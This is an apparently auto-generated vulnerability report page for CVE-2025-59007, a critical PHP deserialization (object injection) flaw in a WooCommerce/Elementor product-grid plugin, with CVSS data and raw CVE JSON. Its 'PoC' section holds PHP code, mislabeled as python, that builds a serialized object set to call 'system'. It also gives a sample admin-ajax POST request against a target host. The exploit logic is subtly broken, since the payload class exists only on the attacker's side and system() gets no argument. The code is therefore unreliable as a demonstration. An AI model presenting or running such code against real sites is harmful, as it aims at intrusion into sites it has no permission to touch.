Security Vulnerability Report
中文
CVE-2025-59007 CVSS 9.8 CRITICAL

CVE-2025-59007

Published: 2025-10-22 15:15:54
Last Modified: 2026-04-27 20:16:24

Description

Deserialization of Untrusted Data vulnerability in themesflat TF Woo Product Grid Addon For Elementor tf-woo-product-grid allows Object Injection.This issue affects TF Woo Product Grid Addon For Elementor: from n/a through <= 1.0.1.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TF Woo Product Grid Addon For Elementor <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-59007 PoC - TF Woo Product Grid Object Injection // This PoC demonstrates the deserialization vulnerability // Use only for authorized security testing class MaliciousPayload { public $callback; function __wakeup() { // This will execute during deserialization if (isset($this->callback)) { call_user_func($this->callback); } } } // Generate malicious serialized object $payload = new MaliciousPayload(); $payload->callback = 'system'; // Could be any危险函数 // Serialize the object for injection $malicious_data = serialize($payload); echo "Malicious serialized data:\n"; echo $malicious_data . "\n\n"; // Alternative: Generate base64 encoded payload for HTTP request $base64_payload = base64_encode($malicious_data); echo "Base64 encoded payload for HTTP request:\n"; echo $base64_payload . "\n"; /* HTTP Request Example: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=tf_woo_product_grid_action&data=BASE64_ENCODED_PAYLOAD */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59007", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:53.730", "lastModified": "2026-04-27T20:16:23.967", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in themesflat TF Woo Product Grid Addon For Elementor tf-woo-product-grid allows Object Injection.This issue affects TF Woo Product Grid Addon For Elementor: from n/a through <= 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tf-woo-product-grid/vulnerability/wordpress-tf-woo-product-grid-addon-for-elementor-plugin-1-0-1-deserialization-of-untrusted-data-vulnerability?_s_id=cve", "source": "[email protected]"}]}}